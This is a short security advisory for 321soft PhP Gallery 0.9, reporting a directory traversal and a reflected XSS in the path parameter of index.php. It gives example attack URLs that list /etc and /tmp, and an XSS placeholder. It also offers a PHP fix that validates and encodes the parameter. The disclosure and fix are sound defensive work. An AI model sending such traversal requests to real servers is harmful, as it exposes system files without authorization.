321soft PhP Gallery 0.9 - directory traversal & XSS

d4igorogmail.com
Date: Tue May 02 2006 - 18:41:03 CDT


321soft PhP Gallery 0.9 - directory traversal & XSS
--------------------------------------------------------
Software: 321soft PhP Gallery
Version: 0.9
Type: directory traversal & XSS
Date: May 3 01:38:04 CEST 2006
Vendor: 321soft.de
Page: http://321soft.de/
Risk: Medium

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
http://[target]/index.php?path=/etc
http://[target]/index.php?path=/tmp

http://[target]/index.php?path=[XSS]

solution:
----------------------------
index.php: validate the $path parameter before it is used to open a directory, and HTML-encode it before it is echoed back to the browser.
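The kind of fix the solution section asks for, as an added illustration rather than the 321soft code; it assumes index.php reads the album subdirectory from $_GET['path'] and lists it under a base directory (here assumed to be albums/):

```php
<?php
// Added illustration, not 321soft PhP Gallery code. Assumes index.php
// reads the album subdirectory from $_GET['path'] and lists its files.
define('GALLERY_BASE', __DIR__ . '/albums'); // assumed base directory

// Returns the validated absolute directory, or null when the request
// must be refused (traversal outside the gallery, or junk in the value).
function resolve_gallery_path(string $base, string $requested): ?string
{
    // Allowlist a simple relative album name: letters, digits, '_', '-', '/'.
    // '.' is not allowed, so "..", "/etc" style absolute paths and
    // script tags never reach the filesystem calls below.
    if ($requested !== '' && !preg_match('#^[A-Za-z0-9_\-/]+$#', $requested)) {
        return null;
    }
    $baseReal = realpath($base);
    $target   = realpath($base . '/' . ltrim($requested, '/'));
    if ($baseReal === false || $target === false || !is_dir($target)) {
        return null;
    }
    // Defence in depth: the canonical target must still sit inside the base.
    if ($target !== $baseReal
        && strpos($target, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $target;
}

$requested = isset($_GET['path']) ? (string) $_GET['path'] : '';
$dir = resolve_gallery_path(GALLERY_BASE, $requested);
if ($dir === null) {
    http_response_code(400);
    // The reflected value is HTML-encoded, which closes the XSS vector.
    echo 'Invalid path: ' . htmlspecialchars($requested, ENT_QUOTES, 'UTF-8');
    exit;
}
foreach (scandir($dir) as $entry) {
    if ($entry === '.' || $entry === '..') {
        continue;
    }
    // File names are attacker-influenced too (uploads), so encode them as well.
    echo htmlspecialchars($entry, ENT_QUOTES, 'UTF-8') . "<br>\n";
}
```

With this in place, requests such as index.php?path=/etc are rejected by the allowlist before any directory is opened, and anything reflected back is encoded.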

notes:
----------------------------
The vendor has been informed.

http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.html